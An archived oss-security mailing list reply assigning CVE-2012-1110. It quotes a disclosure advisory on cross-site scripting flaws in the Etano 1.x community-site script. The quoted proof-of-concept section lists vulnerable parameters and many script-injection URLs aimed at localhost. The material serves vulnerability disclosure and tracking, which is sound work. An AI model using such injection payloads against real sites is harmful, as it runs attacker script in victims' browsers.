Openwall GNU/*/Linux - a small security-enhanced Linux distro for servers
[<prev] [next>] [<thread-prev] [day] [month] [year] [list]
Date: Mon, 05 Mar 2012 14:59:00 -0700
From: Kurt Seifried <kseifried@...hat.com>
To: oss-security@...ts.openwall.com, YGN Ethical Hacker Group <lists@...g.net>
Subject: Re: Etano 1.x <= Multiple Cross Site Scripting Vulnerabilities

On 03/05/2012 09:55 AM, YGN Ethical Hacker Group wrote:
> 1. OVERVIEW
> 
> Etano 1.x versions are vulnerable to Cross Site Scripting.
> 
> 
> 2. BACKGROUND
> 
> The community builder script we provide - Etano - was built entirely
> based on requests from customers of our previous dating package
> (Dating Site Builder). Almost every feature ever requested was built
> into Etano to help you build a better site for your community members.
> You can use Etano to start up a dating site, a social networking site,
> a classifieds site or any other type of site involving groups of
> people, companies, products.
> 
> 
> 3. VULNERABILITY DESCRIPTION
> 
> Multiple parameters were not properly sanitized upon submission to
> join.php, search.php, photo_search.php and photo_view.php , which
> allows attacker to conduct Cross Site Scripting attack. This may allow
> an attacker to create a specially crafted URL that would execute
> arbitrary script code in a victim's browser.
> 
> 
> 4. VERSIONS AFFECTED
> 
> Tested in 1.x versions (1.20-1.22)
> 
> 
> 5. PROOF-OF-CONCEPT/EXPLOIT
> 
> URL: http://localhost/etano/join.php
> Method: POST
> Vulnerable Parameters: user, email, email2, f17_zip, agree
> 
> ------------------------------------------------------------------------------------------------
> 
> URL: http://localhost/etano/search.php
> Method: GET
> Vulnerable Parameters: QUERY STRING, st, f17_city,f17_country ,
> f17_state, f17_zip, f19, wphoto, search, v, return
> 
> 
> http://localhost/etano/search.php?'"><script>alert(/XSS/)</script>
> 
> http://localhost/etano/search.php?st='"><script>alert(/XSS/)</script>
> 
> http://localhost/etano/search.php?f17_city='"><script>alert(/XSS/)</script>&f17_country=0&f17_state=0&f17_zip=3&f19=0&st=basic&wphoto=1
> 
> http://localhost/etano/search.php?f17_city=0&f17_country='"><script>alert(/XSS/)</script>&f17_state=0&f17_zip=3&f19=0&st=basic&wphoto=1
> 
> http://localhost/etano/search.php?f17_city=0&f17_country=0&f17_state='"><script>alert(/XSS/)</script>&f17_zip=3&f19=0&st=basic&wphoto=1
> 
> http://localhost/etano/search.php?f17_city=0&f17_country=0&f17_state=0&f17_zip='"><script>alert(/XSS/)</script>&f19=0&st=basic&wphoto=1
> 
> http://localhost/etano/search.php?f17_city=0&f17_country=0&f17_state=0&f17_zip=3&f19='"><script>alert(/XSS/)</script>&st=basic&wphoto=1
> 
> http://localhost/etano/search.php?f17_city=0&f17_country=0&f17_state=0&f17_zip=3&f19=0&st='"><script>alert(/XSS/)</script>&wphoto=1
> 
> http://localhost/etano/search.php?f17_city=0&f17_country=0&f17_state=0&f17_zip=3&f19=0&st=basic&wphoto='"><script>alert(/XSS/)</script>
> 
> http://localhost/etano/search.php?search='"><script>alert(/XSS/)</script>&v=g
> 
> http://localhost/etano/search.php?search=51d43831f5dde83a4eedb23895f165f6&v='"><script>alert(/XSS/)</script>
> 
> http://localhost/etano/search.php?st=xss"><script>alert(/XSS/)</script>&user=unknown
> 
> ------------------------------------------------------------------------------------------------
> 
> URL: http://localhost/etano/photo_search.php
> Method: GET
> Vulnerable Parameters: QUERY STRING, st, return
> 
> http://localhost/etano/photo_search.php?'"><script>alert(/XSS/)</script>
> 
> http://localhost/etano/photo_search.php?st='"><script>alert(/XSS/)</script>
> 
> ------------------------------------------------------------------------------------------------
> 
> URL: http://localhost/etano/photo_view.php
> Method: GET
> Vulnerable Parameter: return
> 
> http://localhost/etano/photo_view.php?photo_id=1&return="><script>alert(/XSS/)</script>
> 
> 
> 6. SOLUTION
> 
> The vendor hasn't released the fixed yet.
> 
> 
> 7. VENDOR
> 
> Datemill
> http://www.datemill.com/
> 
> 
> 8. CREDIT
> 
> Aung Khant, http://yehg.net, YGN Ethical Hacker Group, Myanmar.
> 
> 
> 9. DISCLOSURE TIME-LINE
> 
> 2011-06-21: notified vendor
> 2012-03-05: vulnerability disclosed
> 
> 
> 10. REFERENCES
> 
> Original Advisory URL:
> http://yehg.net/lab/pr0js/advisories/%5Betano_1.2.x%5D_xss
> 
> 
> #yehg [2012-03-05]

Please use CVE-2012-1110 for this issue.

-- 
Kurt Seifried Red Hat Security Response Team (SRT)

Powered by blists - more mailing lists

Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.

Powered by Openwall GNU/*/Linux - Powered by OpenVZ